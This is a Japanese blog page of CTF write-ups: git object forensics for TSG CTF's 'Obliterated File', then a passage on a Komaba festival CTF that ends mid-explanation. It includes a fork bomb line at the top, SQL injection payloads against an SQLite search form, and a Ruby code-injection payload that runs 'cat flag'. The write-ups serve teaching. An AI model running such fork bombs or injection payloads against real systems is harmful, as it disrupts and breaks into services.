$ :(){ :|:& };:

$ :(){ :|:& };:

:: fork failed: resource temporarily unavailable

TSG CTF Obliterated File Writeup

以下は修正後の Obliterated File Again について述べています. 非想定解と修正(Obliterated File Again)について

問題文

Working on making a problem of TSG CTF, I noticed that I have staged and committed the flag file by mistake before I knew it. I googled and found the following commands, so I'm not sure but anyway typed them. It should be ok, right?

TSG CTFに向けて問題を作っていたんですが,いつの間にか誤ってflagのファイルをコミットしていたことに気付いた!とにかく,Google先生にお伺いして次のようなコマンドを打ちこみました.よくわからないけどこれできっと大丈夫...?

$ git filter-branch --index-filter "git rm -f --ignore-unmatch *flag" --prune-empty -- --all
$ git reflog expire --expire=now --all
$ git gc --aggressive --prune=now

problem.zip

概要

  • 問題文より,filter-branchで全てのコミットについてgit rm -f --ignore-unmatch *flag が適用されていることが分かる. 参考: .4 Git のさまざまなツール - 歴史の書き換え
  • reflogを消去した上でgit gcを実行しているため,一見してflagファイルへの参照は無くなりgcでflagのblobは消去されたように思える.
  • しかしgitはfliter-branch実行時にrefs/heads/masterのcommit/tree/blob objectを単に上書きしたり消去したりするのでは無く,これらを作成直し refs/heads/master がそれらのオブジェクトを向くようにしている.そして,元のHEADは refs/original/*以下に保存している
  • 故にflagのblob objectはrefs/heads/masterからの参照はないものの,refs/original/refs/heads/masterからの参照が存在するためgit gc --aggressive --prune=nowをしてもローカルからは消えない.
  • よって,git filter-branchで消去されたflagのファイルはrefs/original/refs/heads/masterから辿ることが可能である.(想定解法1)
  • 上記の挙動を知らなくても,git rev-listを用いたり,git gcでpackされたgit objectsからgit unpack-objects等でflagのblob objectを特定する等すればこの問題を解くことが出来ると推測出来る.(想定解法2,3)
  • FLAGになっているとおり,git update-ref -d refs/original/refs/heads/master をするとflag blobへの全ての参照が消えるためgit gcで除去される.
$ git cat-file -p c1e375244c834c08d537d564e2763a7b92d5f9a8
x��A
��AP����TJ��i�݋V�7�C7�w���������N)�b7�/z�Xe��  �&��hB6k*�a1k
                                                             ] �a����
                                                                     ��%{%

$ git update-ref -d refs/original/refs/heads/master

$ git gc --aggressive --prune=now
Counting objects: 99, done.
Delta compression using up to 4 threads.
Compressing objects: 100% (90/90), done.
Writing objects: 100% (99/99), done.
Total 99 (delta 38), reused 53 (delta 0)

$ git cat-file -p c1e375244c834c08d537d564e2763a7b92d5f9a8
fatal: Not a valid object name c1e375244c834c08d537d564e2763a7b92d5f9a8

想定解法

1

filter-tree実行時に生成された refs/original/refs/heads/master からcommitとtreeオブジェクトを順に辿っていく

git log は以下の通り

$ git log
commit 13ca1969e42f07352374da0338b1e9ddd406c623 (HEAD, master)
Author: tsgctf <info@tsg.ne.jp>
Date:   Sat May 4 21:01:11 2019 +0900

    delete .travis.yml

commit e6910d795c77de966da4b4da299f44e359cbd791
Author: tsgctf <info@tsg.ne.jp>
Date:   Sat May 4 21:00:53 2019 +0900

    fix the way of posessing the flag

commit 7b20d43eee6cb7f06d553bdf32696f35740c995f
Author: tsgctf <info@tsg.ne.jp>
Date:   Sat May 4 20:58:25 2019 +0900

    fix .gitignore

commit 072690c0aaf46bc7875b67d6323b8f8d2074aaca
Author: tsgctf <info@tsg.ne.jp>
Date:   Sat May 4 20:56:51 2019 +0900

    enable production mode

commit 164349386f4522b1cdee775e63761d57eacbf66a
Author: tsgctf <info@tsg.ne.jp>
Date:   Sat May 4 20:56:02 2019 +0900

    small fix && add readme

commit c4b2408b3646bb0d2d05b639b4d99b009815c97e
Author: tsgctf <info@tsg.ne.jp>
Date:   Sat May 4 20:54:43 2019 +0900

    add problem statement

commit 1132b19fe615106585d0a4d73a1d2caebf213b1c
Author: tsgctf <info@tsg.ne.jp>
Date:   Sat May 4 20:52:29 2019 +0900

    made solvable
(snip)
$ ls .git
COMMIT_EDITMSG ORIG_HEAD      description    index          logs           packed-refs
HEAD           config         hooks          info           objects        refs

$ cat .git/packed-refs
# pack-refs with: peeled fully-peeled sorted
072690c0aaf46bc7875b67d6323b8f8d2074aaca refs/heads/master
1c80e25f51797b19dfbdeb0e2831ebd9bba64ab8 refs/original/refs/heads/master

$ git cat-file -p 1c80e25f51797b19dfbdeb0e2831ebd9bba64ab8
tree d0ca60424dc0174f1e3eb142a508a205e0df8df7
parent 353d6ab1d16539043e9bef6743db1f7bc6a02391
author tsgctf <info@tsg.ne.jp> 1556971011 +0900
committer tsgctf <info@tsg.ne.jp> 1556971011 +0900

enable production mode

git filter-branchenable production modeの時点で行われたことが分かる.

$ git cat-file -p d0ca60424dc0174f1e3eb142a508a205e0df8df7
100644 blob 163eb75c85257e212368c0694a2947ebcd4c9bcc    .editorconfig
100644 blob ffc7b6ac56d181e10a191d2c4115aa8d83aec847    .travis.yml
100644 blob 6eec6e57cc9eb5aa67f09fb73bdb3b933d7fdded    README.md
040000 tree d5fe4dc31680a0c12730b4599ecccb369b6a0a14    problem

$ git cat-file -p d5fe4dc31680a0c12730b4599ecccb369b6a0a14
100644 blob 94ae2db65e3dc2365cdc8136dececdbc35374adc    .gitignore
100644 blob dd46f3189d012d72738a6aa20358581d71945bca    README.md
100644 blob c1e375244c834c08d537d564e2763a7b92d5f9a8    flag
100644 blob 02d365359d84a5d4f4317fa3549fe073a024c502    main.cr
100644 blob a56e0143927a72fee0c6f00618442def5cd60fac    shard.lock
100644 blob d3a384c81e3e530ad97719e80b8223ed7754a4a2    shard.yml
040000 tree 69c2b0afdb2a14797f43e4424dc06cc6202bea1f    src

以上を $ git checkout 1c80e25f51797b19dfbdeb0e2831ebd9bba64ab8git checkout refs/original/refs/heads/master としても良い

$ git cat-file -p c1e375244c834c08d537d564e2763a7b92d5f9a8 > flag

$ file flag
flag: zlib compressed data
# これはmain.crを見ても分かる

$ pry
[1] pry(main)> require "zlib"
=> true
[2] pry(main)> file = File.binread "flag"
=> "x\x9C\v\tvw\x0Eq\xABV\x89O\xCF,\x89/-HI,I\xD5-JM\x8B\xD7M\x89\aR\xC5\xFA\xF9E\x99\xE9\x99y\x899\xFA`^FjbJ\xB1~nbqIjQ-\x00\x85\xEB\x16("
[3] pry(main)> inz = Zlib::Inflate.new
=> #<Zlib::Inflate:0x007fbf28073070 @dictionaries={}>
[4] pry(main)> flag = inz.inflate file
=> "TSGCTF{$_git_update-ref_-d_refs/original/refs/heads/master}"

2

git rev-listを使う

git rev-list master ならばmasterのHEADから辿れるcommit objectを列挙
git rev-list --all で全てのcommit objectを列挙
git rev-list --objects -all で全てのgit objectを列挙

$ git rev-list --objects --all
13ca1969e42f07352374da0338b1e9ddd406c623
e6910d795c77de966da4b4da299f44e359cbd791
7b20d43eee6cb7f06d553bdf32696f35740c995f
1c80e25f51797b19dfbdeb0e2831ebd9bba64ab8
072690c0aaf46bc7875b67d6323b8f8d2074aaca
353d6ab1d16539043e9bef6743db1f7bc6a02391
164349386f4522b1cdee775e63761d57eacbf66a
78036f3e858975d2c574d81ba6c3a6f57573314a
c4b2408b3646bb0d2d05b639b4d99b009815c97e
afafedc82152dd8f38497ae1b17bedd7b647e062
1132b19fe615106585d0a4d73a1d2caebf213b1c
8316c40ce4f952bd9a10bf53921eb1039820d403
6b4cbce5f389a45bc849f07fa5c17a8b7f43f005
bff308624444eed4cac43b0d432a92d2d350fcfb
f4416accd32d3063630d243770ff6d1ba79ac209
b346b76e3642b0b33f5b17a19761b8d77276473b
b614e74c0d6db7c50c64a6f643c08e768308295c
828b54e76c9ee94b1d9a478aef792726c60a01bc
0f0a48cede1c8edb37b9449b7de0eb28402db1fc
166baf8b5abaf404923426c08199e7396628e759
4801d6ec013679a4cd8353812fa9502418ba6237
d3953a7e9d5e89a07f767851721c09b543fe1a9b
5d04bb5c39d8821c57d6e109088caefbdfd9660b
163eb75c85257e212368c0694a2947ebcd4c9bcc .editorconfig
6eec6e57cc9eb5aa67f09fb73bdb3b933d7fdded README.md
fae323e2976c63f9aab36283ded3a205b02cd8da problem
4e48cb9537172cfcf4174c999ee409ca70139c3d problem/.gitignore
dd46f3189d012d72738a6aa20358581d71945bca problem/README.md
8e497982ba717ee0fe21acd4d6a1beb74be0f90f problem/main.cr
a56e0143927a72fee0c6f00618442def5cd60fac problem/shard.lock
d3a384c81e3e530ad97719e80b8223ed7754a4a2 problem/shard.yml
69c2b0afdb2a14797f43e4424dc06cc6202bea1f problem/src
77248329a5e663f2ac278c095f113d27b4e8f8be problem/src/app.cr
d756753ddde35b336989129b46062c22e97d0e38 problem/src/public
d564d0bc3dd917926892c55e3706cc116d5b165e problem/src/public/css
e69de29bb2d1d6434b8b29ae775ad8c2e48c5391 problem/src/public/css/.gitkeep
43988cd07d60aa41f61e6e2421156068b3f8632b problem/src/views
567458274957b016d5016532662137022b650439 problem/src/views/index.ecr
956542f28d8010bc0ceec6ae9dfdb84e49fa2d2b problem/src/views/layout.ecr
d0750a2659e0c89c3e61a2c6d8573c52adafe860 problem/src/views/login.ecr
a0f3b51d97779b176407ff04686cdc6105851799 problem/src/views/register.ecr
8716dd0de5702371cc61c4627865bcaf16ddb448
ffc7b6ac56d181e10a191d2c4115aa8d83aec847 .travis.yml
4e342ba6d191971197bb40023855b53a0155060b
50935b0c64743459d3ffdfabb31229af867b949e problem
02d365359d84a5d4f4317fa3549fe073a024c502 problem/main.cr
d0ca60424dc0174f1e3eb142a508a205e0df8df7
d5fe4dc31680a0c12730b4599ecccb369b6a0a14 problem
94ae2db65e3dc2365cdc8136dececdbc35374adc problem/.gitignore
c1e375244c834c08d537d564e2763a7b92d5f9a8 problem/flag
7edb96cb41cbfea869dabc7de625a5e50abd71ea
37a62992ec0d4c83df1d6952933c0afaa135d6a8 problem
27b5ce64362f03ef9a7f044e677fba81ab47544b
1f34928d090b69867f664dcbef276d53a29483cc problem
ebc4754f23719c17eedf24af0187be86b52e71d2 problem/main.cr
157d2e555e663ffb6e203a4ecc62a9e599e259ab
6361c720b6a55eb93f42cd57a48cc27805442a53 problem
7459ce4ad03f11e4f9aae544274766edd675fe11
2aea982ed4eb63a835ce71322379720fb45e3a7a problem
34b46ad3604df653c93fcede1b7e2c546a748032 problem/src
2c6881340dd54ea0fbc6013da69701adf77cd80f problem/src/views
798fae498457783788a70719f5176d7542c10e72 problem/src/views/layout.ecr
bfa5390abc0810070a1983a6ff8982bcc2a6a196
5e1b13226968864981f768dd68bb3a5141f10b26 problem
ff591ccbfb2cf72a371008a82f4210209797584f
60723b12e68c53e802729604a16931e74f000e81 README.md
484d7614db417d10ab3116c9ce11d03b6d380f14
67960090c674d6d824da50dfd45d8f12d83786e6
fa7b6981166dcad181464007968ddf2c44b88973 .gitignore
00ba81bd54c79a5e712435ee9ecd2b2d8585917c main.cr
23c5b636f8501a098860f40e56b2beb29d5fa410 src
a416178f93b9276bfcfd300dc196e1952e717331 src/app.cr
cd7068e30ead3aa205f7bc8c73e1caa8854221a3
da64e5cf3af628fed6a351de35fbca1f39a61b84 src
62062f1afde0d9ae9b4d91781780dd615c6448f9 src/app.cr
e79b903e56ed961fd3c0076682976d045f7cec52
6754b81daa8414ea07475e5350f2d54c7523b989 src
abf4339ce17591e3712d2dc375864493c82d207b src/app.cr
e78e4553e8c4e68a733f67ba8abaed1db3bb95e0
56fced572a5abc13cf60a8a49a19d5af87f61d87 src
501072473b04d8d2eaf05d13cc71fa2568ec3d6c src/app.cr
97fe1a6ab46a57cfa8043a17395b2501332c2436
0bb75ea03f73a8764f724a990b6145f0b929c3f8 .gitignore
a2cdcc183cceecbc5a0f8532245e608b90c6340f main.cr
79e09050a3fab6a7c8002ddecd9ba97e1ba6e01f shard.lock
2d412b10aefe0f80e26536c8ec1a58d4b30df1bf shard.yml
5c6f3673d687b416b32cd6d1d49d85da60c66950 src
e9441ab4fc0a169d8482e76da4b9f55a6caa5823 src/app.cr
76d6409dbcb16c8282b966f2c0491c02364fcf7b src/views
36659906848b844b0ac530a4efd3dc646fd3f7b2 src/views/index.ecr
8a5cd16517aacf3b150620f6c5347d8e27ef47dc src/views/layout.ecr
7ddff67ab554b53d00d00ae91a3b4c36578b37f0
c29410cbe0e08299c0f0ee8085642bd24a838485 main.cr
0dc0e23010600ab04db1cfef617b35cb9a808668
9f88382a6895bd951d953155960c0ed5a8612303 main.cr
4b1026ccafd4c79a70a10b46c5531fc331e92b6a
0d84bf0607785e59be1448379961ec8064b4d92e main.cr
d630e501eea771f59769592170cdc0bf2d741ae6 shard.lock
89db2e6e905c3036b53672b3c3bc9fad472fa368 shard.yml
ff42cc4a1974e58b02772f401321ba3f57846e38 views
fa17d60b89e69d855a7c01363435995b4dd67def views/index.ecr
91a3b5d486e8cce94c981e459db47a2fa4497e1b
2ff872c5b6173fdb325f89c90b251daebf91092c README.md
18799361bcac695368b53df8847b57ba34967a50 main.cr
51422bc8c729b297e89be5028b080d37f5fa71e8 views
a5f2f7907b07430751f2707bf7d12d5cd9bd7be2 views/index.ecr
a63dcfb386a4b30e3a1d85641cfb1aae8ecbbb5c
72e3d57df672e811ef56d4fa993a71da33a1de91 main.cr
207cef168362ac985a373f49fdbcf1d29035b6fb
f87f5c14cbbd7d462ab7c5ed4f7b4b822d3254a4 main.cr
0b02e2f465e326a2fb4327a1ed2a64ed95084ee6 shard.yml

$ git rev-list --objects --all | grep flag
c1e375244c834c08d537d564e2763a7b92d5f9a8 problem/flag

後は1と同じ

3

gcで生成されたidxファイルからblobファイルを見ていく / git unpack-objects等を使う

とりあえずpackの中にあるだろうということからゴリ押しで解くことも出来る.

$ tree .git/objects
.git/objects
├── 13
│   └── ca1969e42f07352374da0338b1e9ddd406c623
├── 4e
│   ├── 342ba6d191971197bb40023855b53a0155060b
│   └── 48cb9537172cfcf4174c999ee409ca70139c3d
├── 50
│   └── 935b0c64743459d3ffdfabb31229af867b949e
├── 5d
│   └── 04bb5c39d8821c57d6e109088caefbdfd9660b
├── 7b
│   └── 20d43eee6cb7f06d553bdf32696f35740c995f
├── 87
│   └── 16dd0de5702371cc61c4627865bcaf16ddb448
├── 8e
│   └── 497982ba717ee0fe21acd4d6a1beb74be0f90f
├── e6
│   └── 910d795c77de966da4b4da299f44e359cbd791
├── fa
│   └── e323e2976c63f9aab36283ded3a205b02cd8da
├── info
│   └── packs
└── pack
    ├── pack-b799d65ebb2cc3fab7878fcf2a2642585de29408.idx
    └── pack-b799d65ebb2cc3fab7878fcf2a2642585de29408.pack

11 directories, 13 files

# filter-branch後に数コミットしているのでpackされてないオブジェクトもある

$ git verify-pack -v .git/objects/pack/pack-b799d65ebb2cc3fab7878fcf2a2642585de29408.idx
072690c0aaf46bc7875b67d6323b8f8d2074aaca commit 217 152 12
1c80e25f51797b19dfbdeb0e2831ebd9bba64ab8 commit 217 151 164
164349386f4522b1cdee775e63761d57eacbf66a commit 218 156 315
353d6ab1d16539043e9bef6743db1f7bc6a02391 commit 218 156 471
c4b2408b3646bb0d2d05b639b4d99b009815c97e commit 216 151 627
78036f3e858975d2c574d81ba6c3a6f57573314a commit 216 151 778
1132b19fe615106585d0a4d73a1d2caebf213b1c commit 208 147 929
afafedc82152dd8f38497ae1b17bedd7b647e062 commit 53 65 1076 1 1132b19fe615106585d0a4d73a1d2caebf213b1c
8316c40ce4f952bd9a10bf53921eb1039820d403 commit 205 146 1141
6b4cbce5f389a45bc849f07fa5c17a8b7f43f005 commit 205 146 1287
bff308624444eed4cac43b0d432a92d2d350fcfb commit 232 163 1433
f4416accd32d3063630d243770ff6d1ba79ac209 commit 239 170 1596
b346b76e3642b0b33f5b17a19761b8d77276473b commit 224 159 1766
b614e74c0d6db7c50c64a6f643c08e768308295c commit 216 155 1925
828b54e76c9ee94b1d9a478aef792726c60a01bc commit 225 162 2080
0f0a48cede1c8edb37b9449b7de0eb28402db1fc commit 212 155 2242
166baf8b5abaf404923426c08199e7396628e759 commit 204 146 2397
4801d6ec013679a4cd8353812fa9502418ba6237 commit 216 153 2543
d3953a7e9d5e89a07f767851721c09b543fe1a9b commit 161 117 2696
163eb75c85257e212368c0694a2947ebcd4c9bcc blob   150 118 2813
ffc7b6ac56d181e10a191d2c4115aa8d83aec847 blob   18 28 2931
6eec6e57cc9eb5aa67f09fb73bdb3b933d7fdded blob   64 74 2959
94ae2db65e3dc2365cdc8136dececdbc35374adc blob   46 49 3033
dd46f3189d012d72738a6aa20358581d71945bca blob   134 100 3082
02d365359d84a5d4f4317fa3549fe073a024c502 blob   458 303 3182
a56e0143927a72fee0c6f00618442def5cd60fac blob   507 226 3485
d3a384c81e3e530ad97719e80b8223ed7754a4a2 blob   297 178 3711
77248329a5e663f2ac278c095f113d27b4e8f8be blob   2136 632 3889
e69de29bb2d1d6434b8b29ae775ad8c2e48c5391 blob   0 9 4521
567458274957b016d5016532662137022b650439 blob   288 156 4530
956542f28d8010bc0ceec6ae9dfdb84e49fa2d2b blob   111 85 4686
36659906848b844b0ac530a4efd3dc646fd3f7b2 blob   355 161 4771
d0750a2659e0c89c3e61a2c6d8573c52adafe860 blob   36 47 4932 1 36659906848b844b0ac530a4efd3dc646fd3f7b2
a0f3b51d97779b176407ff04686cdc6105851799 blob   161 106 4979
7edb96cb41cbfea869dabc7de625a5e50abd71ea tree   151 154 5085
d5fe4dc31680a0c12730b4599ecccb369b6a0a14 tree   247 233 5239
37a62992ec0d4c83df1d6952933c0afaa135d6a8 tree   9 20 5472 1 d5fe4dc31680a0c12730b4599ecccb369b6a0a14
69c2b0afdb2a14797f43e4424dc06cc6202bea1f tree   99 106 5492
d756753ddde35b336989129b46062c22e97d0e38 tree   59 45 5598
d564d0bc3dd917926892c55e3706cc116d5b165e tree   36 47 5643
43988cd07d60aa41f61e6e2421156068b3f8632b tree   152 141 5690
d0ca60424dc0174f1e3eb142a508a205e0df8df7 tree   27 40 5831 1 7edb96cb41cbfea869dabc7de625a5e50abd71ea
c1e375244c834c08d537d564e2763a7b92d5f9a8 blob   99 112 5871
157d2e555e663ffb6e203a4ecc62a9e599e259ab tree   27 40 5983 1 7edb96cb41cbfea869dabc7de625a5e50abd71ea
1f34928d090b69867f664dcbef276d53a29483cc tree   30 43 6023 1 d5fe4dc31680a0c12730b4599ecccb369b6a0a14
6361c720b6a55eb93f42cd57a48cc27805442a53 tree   9 19 6066 2 1f34928d090b69867f664dcbef276d53a29483cc
ebc4754f23719c17eedf24af0187be86b52e71d2 blob   11 22 6085 1 02d365359d84a5d4f4317fa3549fe073a024c502
27b5ce64362f03ef9a7f044e677fba81ab47544b tree   27 40 6107 1 7edb96cb41cbfea869dabc7de625a5e50abd71ea
bfa5390abc0810070a1983a6ff8982bcc2a6a196 tree   27 40 6147 1 7edb96cb41cbfea869dabc7de625a5e50abd71ea
2aea982ed4eb63a835ce71322379720fb45e3a7a tree   30 43 6187 2 1f34928d090b69867f664dcbef276d53a29483cc
5e1b13226968864981f768dd68bb3a5141f10b26 tree   9 19 6230 3 2aea982ed4eb63a835ce71322379720fb45e3a7a
34b46ad3604df653c93fcede1b7e2c546a748032 tree   25 38 6249 1 69c2b0afdb2a14797f43e4424dc06cc6202bea1f
2c6881340dd54ea0fbc6013da69701adf77cd80f tree   30 43 6287 1 43988cd07d60aa41f61e6e2421156068b3f8632b
798fae498457783788a70719f5176d7542c10e72 blob   172 129 6330
7459ce4ad03f11e4f9aae544274766edd675fe11 tree   27 40 6459 1 7edb96cb41cbfea869dabc7de625a5e50abd71ea
ff591ccbfb2cf72a371008a82f4210209797584f tree   327 300 6499
484d7614db417d10ab3116c9ce11d03b6d380f14 tree   9 20 6799 1 ff591ccbfb2cf72a371008a82f4210209797584f
60723b12e68c53e802729604a16931e74f000e81 blob   90 80 6819
67960090c674d6d824da50dfd45d8f12d83786e6 tree   75 89 6899 2 484d7614db417d10ab3116c9ce11d03b6d380f14
fa7b6981166dcad181464007968ddf2c44b88973 blob   41 44 6988
00ba81bd54c79a5e712435ee9ecd2b2d8585917c blob   19 31 7032 1 02d365359d84a5d4f4317fa3549fe073a024c502
23c5b636f8501a098860f40e56b2beb29d5fa410 tree   99 106 7063
a416178f93b9276bfcfd300dc196e1952e717331 blob   126 126 7169 1 77248329a5e663f2ac278c095f113d27b4e8f8be
cd7068e30ead3aa205f7bc8c73e1caa8854221a3 tree   28 41 7295 3 67960090c674d6d824da50dfd45d8f12d83786e6
da64e5cf3af628fed6a351de35fbca1f39a61b84 tree   66 76 7336
62062f1afde0d9ae9b4d91781780dd615c6448f9 blob   17 30 7412 2 a416178f93b9276bfcfd300dc196e1952e717331
e79b903e56ed961fd3c0076682976d045f7cec52 tree   28 41 7442 3 67960090c674d6d824da50dfd45d8f12d83786e6
6754b81daa8414ea07475e5350f2d54c7523b989 tree   66 76 7483
abf4339ce17591e3712d2dc375864493c82d207b blob   52 61 7559 2 a416178f93b9276bfcfd300dc196e1952e717331
e78e4553e8c4e68a733f67ba8abaed1db3bb95e0 tree   28 41 7620 3 67960090c674d6d824da50dfd45d8f12d83786e6
56fced572a5abc13cf60a8a49a19d5af87f61d87 tree   66 76 7661
501072473b04d8d2eaf05d13cc71fa2568ec3d6c blob   116 82 7737 2 a416178f93b9276bfcfd300dc196e1952e717331
7ddff67ab554b53d00d00ae91a3b4c36578b37f0 tree   297 275 7819
97fe1a6ab46a57cfa8043a17395b2501332c2436 tree   55 70 8094 1 7ddff67ab554b53d00d00ae91a3b4c36578b37f0
0bb75ea03f73a8764f724a990b6145f0b929c3f8 blob   37 43 8164
a2cdcc183cceecbc5a0f8532245e608b90c6340f blob   81 78 8207
79e09050a3fab6a7c8002ddecd9ba97e1ba6e01f blob   10 21 8285 1 a56e0143927a72fee0c6f00618442def5cd60fac
2d412b10aefe0f80e26536c8ec1a58d4b30df1bf blob   6 17 8306 1 d3a384c81e3e530ad97719e80b8223ed7754a4a2
5c6f3673d687b416b32cd6d1d49d85da60c66950 tree   66 76 8323
e9441ab4fc0a169d8482e76da4b9f55a6caa5823 blob   27 38 8399 3 501072473b04d8d2eaf05d13cc71fa2568ec3d6c
76d6409dbcb16c8282b966f2c0491c02364fcf7b tree   75 80 8437
8a5cd16517aacf3b150620f6c5347d8e27ef47dc blob   21 33 8517 1 798fae498457783788a70719f5176d7542c10e72
c29410cbe0e08299c0f0ee8085642bd24a838485 blob   96 96 8550 4 e9441ab4fc0a169d8482e76da4b9f55a6caa5823
0dc0e23010600ab04db1cfef617b35cb9a808668 tree   30 43 8646 1 7ddff67ab554b53d00d00ae91a3b4c36578b37f0
9f88382a6895bd951d953155960c0ed5a8612303 blob   10 21 8689 5 c29410cbe0e08299c0f0ee8085642bd24a838485
4b1026ccafd4c79a70a10b46c5531fc331e92b6a tree   297 274 8710
0d84bf0607785e59be1448379961ec8064b4d92e blob   218 162 8984
d630e501eea771f59769592170cdc0bf2d741ae6 blob   13 24 9146 1 a56e0143927a72fee0c6f00618442def5cd60fac
89db2e6e905c3036b53672b3c3bc9fad472fa368 blob   6 17 9170 1 d3a384c81e3e530ad97719e80b8223ed7754a4a2
ff42cc4a1974e58b02772f401321ba3f57846e38 tree   75 79 9187
fa17d60b89e69d855a7c01363435995b4dd67def blob   51 56 9266
91a3b5d486e8cce94c981e459db47a2fa4497e1b tree   86 101 9322 1 4b1026ccafd4c79a70a10b46c5531fc331e92b6a
2ff872c5b6173fdb325f89c90b251daebf91092c blob   614 317 9423
18799361bcac695368b53df8847b57ba34967a50 blob   16 28 9740 1 0d84bf0607785e59be1448379961ec8064b4d92e
51422bc8c729b297e89be5028b080d37f5fa71e8 tree   75 80 9768
a5f2f7907b07430751f2707bf7d12d5cd9bd7be2 blob   17 27 9848
a63dcfb386a4b30e3a1d85641cfb1aae8ecbbb5c tree   30 45 9875 2 91a3b5d486e8cce94c981e459db47a2fa4497e1b
72e3d57df672e811ef56d4fa993a71da33a1de91 blob   59 67 9920
207cef168362ac985a373f49fdbcf1d29035b6fb tree   64 79 9987 2 91a3b5d486e8cce94c981e459db47a2fa4497e1b
f87f5c14cbbd7d462ab7c5ed4f7b4b822d3254a4 blob   6 15 10066
0b02e2f465e326a2fb4327a1ed2a64ed95084ee6 blob   13 24 10081 1 d3a384c81e3e530ad97719e80b8223ed7754a4a2
non delta: 61 objects
chain length = 1: 25 objects
chain length = 2: 8 objects
chain length = 3: 5 objects
chain length = 4: 1 object
chain length = 5: 1 object
.git/objects/pack/pack-b799d65ebb2cc3fab7878fcf2a2642585de29408.pack: ok

4

gcで生成されたpackをzlibで無理やり展開してゴリ押しreconをする(gitのオブジェクトは全てzlibで圧縮されているため)

Flag

Obliterated File TSGCTF{$_git_update-ref_-d_refs/original/refs/heads/master}
Obliterated File Again TSGCTF{$_git_update-ref_-d_refs/original/refs/heads/master_S0rry_f0r_m4king_4_m1st4k3_0n_th1s_pr0bl3m}

非想定解と修正(Obliterated File Again)について

初めに公開された問題 Obliterated File にて実行されたコマンドは以下の通り

$ git filter-branch --index-filter "git rm -f --ignore-unmatch flag" --prune-empty -- --all
$ git reflog expire --expire=now --all
$ git gc --aggressive --prune=now

これによりflagのファイルの乗ったコミットが refs/heads/master から辿れる場所に1つだけ存在している状態になっていました.この問題を修正したものを Obliterated File Again として出題し初期得点を250ずつに配分しました.大変失礼いたしました.

駒場祭 TSGCTF day1 Writeup

これは TSG Advent Calendar 2018 の3日目の記事です.

adventar.org

昨日12/2は くっきーさんの駒場祭企画 TSG LIVE! 2 CTF DAY1の問題 でした.


先日11/23-25に駒場祭があり.私が所属しているサークルTSG(東京大学理論科学グループ)では企画として3日間を通してプログラミングの生放送をしました.そのうち,私は配信の関係でhakatashiさんの代わりのJP3BGY氏と共に1日目のLIVE CTFにプレイヤーとして参加をしました.

5問のうち本番1時間で解けた問題は simqleの1問のみでしたが,終了後これに加え3問解くことができたので,計4問のWriteupを公開します. ちなみに残り1問のforensicはJP3BGY氏が実質解けたと仰っていたのでめでたくTeamBLUEは全完です(いいえ) 追記(2018/12/6):僕がforも解いたので全完です わいわい

問題は以下で公開されています.

https://ctf-day1.tsg.ne.jp/

問題製作者のくっきー氏曰く12/9までは少なくとも遊べるようになっているそうです.

[Web 100] simqle

TSG部員の情報を検索できるようなフォームがあるWebページが渡される.

f:id:taiyoslime:20181203194457p:plain

ソースコードが与えられており,フォームのパラメータを受けとりSQL文を発行している部分を抽出すると以下のようになっている. ( https://github.com/cookie-s/tsgctf-kmbfes18-day1-pub/blob/master/web-simqle/app.rb からでも閲覧可能)

...
params = JSON.parse request.body.read rescue return 400
%w(name since until title url).each do |key|
    return 400 if params[key] && params[key].bytesize > 500
end
return 400 if params["name"] && params["name"].bytesize > 20

filter = "name LIKE '%%%s%%'" % params["name"]
filter+= params["since"] && params["until"] ?
  " AND year BETWEEN %d AND %d" % [params["since"].to_i, params["until"].to_i] : ''
filter+= params["title"] ?
  " AND title LIKE '%%%s%%'" % sql_escape(params["title"]) : ''
filter+= params["url"] ?
  " AND url LIKE '%%%s%%'" % sql_escape(params["url"]) : ''

sql = "SELECT name, year, title, url FROM members WHERE %s ORDER BY id DESC" % filter
...

また,関数sql_escapeは以下のように定義されている.

def sql_escape(x)
  x.gsub("'", "''")
end

タイトルからもSQL Injectionをする問題とみて間違いなさそうなので,SQLiteにおいてメタ情報を格納しているsqlite_masterテーブルのtbl_nameから,DB内のテーブル名一覧を抜き出すことを目標にSQLiできそうな場所を探す.

一見 title' union SELECT tbl_name,1,1,1 from sqlite_master --で終わりのように見えるが20文字以上になってしまうため上手く動かない.

そこで,例えば name' AND "title" union SELECT tbl_name,1,1,1 from sqlite_master -- とすると,最終的なSQL文となる文字列sql

SELECT name, year, title, url FROM members WHERE name LIKE '%' AND "%' AND year BETWEEN 0 AND 0 AND title LIKE '%" union SELECT tbl_name,1,1,1 from sqlite_master --%' AND url LIKE '%%' ORDER BY id DESC

となり上手く間が文字列となってくれSQLiが成功する.

上のSQLiが成功した結果,memberssqlite_sequenceの他にfl4gというテーブルがあることがわかる.

よって,同じように,name = ' and "title = " union SELECT *,1,1,1 from fl4g -- とすると,FLAGが出現した.

FLAG : TSGCTF{159_MEMBERS_ARE_IN_SLACK}

[Web 150] sha

saltflag の2つのテキストボックスをもつフォームが与えられる.

ソースコードが与えられており(https://github.com/cookie-s/tsgctf-kmbfes18-day1-pub/blob/master/web-sha/app.rb からでも閲覧可能),見るとこのsaltflagからcodeを生成し,codeをevalした結果を返却しているようである.コード生成部を抜粋すると次の通り.

salt = params[:salt]
file = params[:file] || 'flag'
logger.info [salt, file]

code = <<-END
require 'digest/sha2'
s = #{salt.inspect} + IO.binread(%p.gsub(?/,''))
puts Digest::SHA512.hexdigest(s)
END
code = code % file

一瞬伸長攻撃につなげる問題かと考えたが,Web問なので素直にWeb的にflagファイルを読み出す方法を考える.

直ぐ思いついたものは%pに適切なものを入れて任意コード実行するというもの.%pは与えられたObjectに対してObject#inspectをするようなsprintfのフォーマットであり,Object#inspectはオブジェクトを可読性の高い文字列に変換するメソッドである.例えば "hoge".inspect"\"hoge\""""\"".inspect""\"\\\"\"" となる.

ここからも分かるように,codeの2行目の%pの部分には少なくとも文字列としてダブルクオーテーションに囲まれた何かが入る訳で,例えばこの"を閉じて任意実行に持っていく発想として file = "\");puts `cat flag#" みたいなものを投げ,codes = #{salt.inspect} + IO.binread("");puts `cat flag#".gsub(?/,'')) のような文字列になることを期待したいとする.

しかし,先程見たとおり当然""\"".inspect""\"\\\"\""であるからs = #{salt.inspect} + IO.binread("\");puts `cat flag#".gsub(?/,''))という文字列 1 になってしまう.(要するに文字列をinspectすることで生じるダブルクオーテーションを閉じることは出来ない)故に%pの部分を用いて任意コード実行できるようなRubyコードを構成することは難しいように思える.

そのためsaltに例えば%s等を投げて,そちらにinjectすれば良いのでは無いかと試しているところで時間が終わる.

この方針は結局正しくて,salt="%s" とすると codeの2行目の文字列は

s = "%s" + IO.binread(%p.gsub(?/,'')) となる.2

